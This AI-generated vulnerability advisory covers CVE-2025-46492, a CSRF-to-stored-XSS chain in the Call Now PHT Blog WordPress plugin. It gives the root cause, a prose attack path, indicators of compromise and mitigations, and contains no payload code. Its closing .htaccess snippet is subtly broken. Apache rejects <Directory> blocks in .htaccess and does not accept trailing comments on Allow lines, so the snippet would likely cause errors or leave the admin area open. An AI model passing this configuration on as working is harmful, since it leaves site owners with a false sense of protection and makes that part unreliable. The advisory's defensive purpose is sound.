CVE-2025-46492 Overview
CVE-2025-46492 is a Cross-Site Request Forgery (CSRF) vulnerability in the Call Now PHT Blog WordPress plugin (call-now-coccoc-pht-blog) developed by Pham Thanh. This vulnerability allows attackers to chain CSRF with Stored Cross-Site Scripting (XSS), enabling malicious actors to inject persistent scripts into the affected WordPress site through forged requests.
The vulnerability exists because the plugin fails to properly validate request origins through nonce verification, allowing attackers to craft malicious requests that, when executed by an authenticated administrator, can store malicious JavaScript code within the plugin's settings. This stored payload then executes in the browsers of subsequent visitors or administrators accessing the affected pages.
Critical Impact
Attackers can exploit this CSRF-to-XSS chain to steal administrator session cookies, perform unauthorized administrative actions, deface websites, redirect users to malicious sites, or distribute malware to site visitors.
Affected Products
- Call Now PHT Blog WordPress Plugin versions up to and including 2.4.1
- WordPress installations running vulnerable versions of call-now-coccoc-pht-blog plugin
Discovery Timeline
- 2025-04-24 - CVE-2025-46492 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2025-46492
Vulnerability Analysis
This vulnerability combines two distinct attack vectors: Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS). The CSRF component allows an attacker to trick an authenticated WordPress administrator into submitting a malicious request without their knowledge. Because the plugin does not implement proper CSRF protections such as WordPress nonce verification, these forged requests are processed as legitimate.
The Stored XSS component allows malicious JavaScript payloads to be persistently saved within the plugin's configuration or database entries. Once stored, these scripts execute whenever the affected content is rendered, impacting all users who view the compromised pages. The network-based attack vector with low complexity makes this vulnerability particularly dangerous for WordPress sites with high traffic or multiple administrators.
The scope is changed (as indicated by the changed scope metric), meaning the vulnerability can affect resources beyond the vulnerable component itself, potentially compromising the security context of the entire WordPress installation and its visitors.
Root Cause
The root cause of this vulnerability is improper implementation of security controls within the Call Now PHT Blog plugin. Specifically:
Missing CSRF Token Validation: The plugin's settings forms and AJAX handlers do not properly verify WordPress nonces, allowing cross-origin requests to be processed without validation.
Insufficient Input Sanitization: User-supplied input is not properly sanitized or escaped before being stored in the database, enabling malicious script injection.
Missing Output Encoding: When the stored data is rendered in the browser, it lacks proper output encoding, allowing stored scripts to execute in users' browsers.
Attack Vector
The attack follows a chained exploitation path:
Reconnaissance: The attacker identifies a WordPress site running Call Now PHT Blog plugin version 2.4.1 or earlier.
Payload Crafting: The attacker creates a malicious HTML page containing a hidden form that targets the vulnerable plugin endpoint with XSS payload.
Social Engineering: The attacker tricks a WordPress administrator into visiting the malicious page while authenticated to their WordPress dashboard.
CSRF Execution: The hidden form auto-submits, sending the malicious request with the administrator's session cookies.
XSS Storage: The malicious JavaScript payload is stored in the plugin's settings or database.
Payload Execution: When any user visits pages where the plugin renders its content, the stored XSS payload executes in their browser context.
The attack does not require authentication from the attacker's perspective but does require user interaction (administrator visiting the malicious page), which is reflected in the vulnerability's characteristics.
Detection Methods for CVE-2025-46492
Indicators of Compromise
- Unexpected JavaScript code or <script> tags in plugin settings or database fields related to Call Now PHT Blog
- Unusual administrator activity logs showing settings changes without corresponding legitimate actions
- Reports from users about unexpected redirects, pop-ups, or browser warnings when visiting the site
- Browser console errors or network requests to unfamiliar external domains originating from plugin-rendered content
Detection Strategies
- Review WordPress plugin settings for Call Now PHT Blog and inspect for suspicious script content
- Implement Content Security Policy (CSP) headers to detect and block unauthorized inline script execution
- Monitor WordPress audit logs for settings changes, particularly those made without corresponding admin interface access
- Use web application security scanners to identify stored XSS payloads in the database
Monitoring Recommendations
- Enable comprehensive WordPress activity logging to track all plugin settings modifications
- Deploy a Web Application Firewall (WAF) configured to detect CSRF and XSS attack patterns
- Regularly scan the WordPress database for suspicious content patterns in plugin-related tables
- Monitor browser console outputs during site testing for unexpected script execution
How to Mitigate CVE-2025-46492
Immediate Actions Required
- Update Call Now PHT Blog plugin to a patched version when available from the developer
- If no patch is available, consider deactivating and removing the Call Now PHT Blog plugin until a fix is released
- Review current plugin settings for any suspicious or unexpected content and remove malicious entries
- Implement a Web Application Firewall (WAF) with CSRF and XSS protection rules
- Rotate WordPress administrator credentials if compromise is suspected
Patch Information
As of the last NVD update, users should check for updates to the Call Now PHT Blog plugin through the WordPress plugin repository or contact the developer directly. For detailed vulnerability information and potential patches, refer to the Patchstack vulnerability database entry.
Workarounds
- Temporarily deactivate the Call Now PHT Blog plugin until a security patch is available
- Restrict WordPress admin panel access to trusted IP addresses only using .htaccess or server-level firewall rules
- Educate administrators about CSRF attacks and advise against clicking unknown links while authenticated
- Implement additional CSRF protection at the server level using security plugins like Wordfence or Sucuri
# WordPress .htaccess configuration to restrict admin access by IP
<Files wp-login.php>
Order Deny,Allow
Deny from all
Allow from 192.168.1.100 # Replace with trusted admin IP
</Files>
<Directory /var/www/html/wp-admin>
Order Deny,Allow
Deny from all
Allow from 192.168.1.100 # Replace with trusted admin IP
</Directory>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
